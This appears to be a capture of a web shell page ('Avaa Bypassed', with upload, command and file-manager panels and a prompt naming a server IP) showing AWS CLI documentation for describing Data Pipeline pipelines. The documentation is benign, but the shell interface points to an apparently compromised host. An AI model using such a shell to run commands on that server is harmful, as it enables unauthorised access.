404

[ Avaa Bypassed ]




Upload:

Command:

botdev@18.217.203.133: ~ $
**To describe your pipelines**

This example describes the specified pipeline::

   aws datapipeline describe-pipelines --pipeline-ids df-00627471SOVYZEXAMPLE
   
The following is example output::

  {
    "pipelineDescriptionList": [
        {
            "fields": [
                {
                    "stringValue": "PENDING",
                    "key": "@pipelineState"
                },
                {
                    "stringValue": "my-pipeline",
                    "key": "name"
                },
                {
                    "stringValue": "2015-04-07T16:05:58",
                    "key": "@creationTime"
                },
                {
                    "stringValue": "df-00627471SOVYZEXAMPLE",
                    "key": "@id"
                },
                {
                    "stringValue": "123456789012",
                    "key": "pipelineCreator"
                },
                {
                    "stringValue": "PIPELINE",
                    "key": "@sphere"
                },
                {
                    "stringValue": "123456789012",
                    "key": "@userId"
                },
                {
                    "stringValue": "123456789012",
                    "key": "@accountId"
                },
                {
                    "stringValue": "my-pipeline-token",
                    "key": "uniqueId"
                }
            ],
            "pipelineId": "df-00627471SOVYZEXAMPLE",
            "name": "my-pipeline",
            "tags": []
        }
    ]
  }

Filemanager

Name Type Size Permission Actions
activate-pipeline.rst File 352 B 0644
add-tags.rst File 667 B 0644
create-pipeline.rst File 239 B 0644
deactivate-pipeline.rst File 358 B 0644
delete-pipeline.rst File 147 B 0644
describe-pipelines.rst File 1.53 KB 0644
get-pipeline-definition.rst File 2.78 KB 0644
list-pipelines.rst File 578 B 0644
list-runs.rst File 1.46 KB 0644
put-pipeline-definition.rst File 386 B 0644
remove-tags.rst File 200 B 0644